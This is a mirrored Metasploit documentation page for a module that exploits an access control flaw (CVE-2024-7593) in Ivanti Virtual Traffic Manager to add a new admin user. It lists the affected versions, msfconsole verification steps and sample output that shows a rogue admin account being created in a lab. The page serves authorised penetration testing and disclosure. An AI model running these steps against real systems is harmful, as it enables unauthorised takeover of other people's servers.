CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/auxiliary/admin/http/ivanti_vtm_admin.md
Views: 1904

Vulnerable Application

This module exploits an access control issue in Ivanti Virtual Traffic Manager (vTM), by adding a new administrative user to the web interface of the application.

Affected versions include:

  • 22.7R1

  • 22.6R1

  • 22.5R1

  • 22.3R2

  • 22.3

  • 22.2

The vendor published an advisory [here] (https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Virtual-Traffic-Manager-vTM-CVE-2024-7593?language=en_US).

A proof-of-concept is available here.

Testing

Docker images with the software are available from here.

Successfully tested on

  • 22.7R1 on Ubuntu 20.04.6 LTS

  • 22.6R1 on Ubuntu 20.04.6 LTS

  • 22.5R1 on Ubuntu 20.04.6 LTS

  • 22.3R1 on Ubuntu 20.04.5 LTS

  • 22.2 on Ubuntu 20.04.4 LTS

Verification Steps

  1. Deploy Ivanti Virtual Traffic Manager (vTM)

  2. Start msfconsole

  3. use auxiliary/admin/http/ivanti_vtm_admin

  4. set RHOSTS <IP>

  5. run

  6. A new admin user should have been added to the web interface.

Options

NEW_USERNAME

Username to be used when creating a new user with admin privileges.

NEW_PASSWORD

Password to be used when creating a new user with admin privileges.

Scenarios

Running the module against Virtual Traffic Manager (vTM) 22.7R1 should result in an output similar to the following:

msf6 > use auxiliary/admin/http/ivanti_vtm_admin msf6 auxiliary(admin/http/ivanti_vtm_admin) > set RHOSTS 172.17.0.2 msf6 auxiliary(admin/http/ivanti_vtm_admin) > exploit [*] Running module against 172.17.0.2 [*] Running automatic check ("set AutoCheck false" to disable) [+] The target appears to be vulnerable. Version: 22.7R1 [+] New admin user was successfully added: h4x0r:w00Tw00T! [+] Login at: https://172.17.0.2:9090/apps/zxtm/login.cgi [*] Auxiliary module execution completed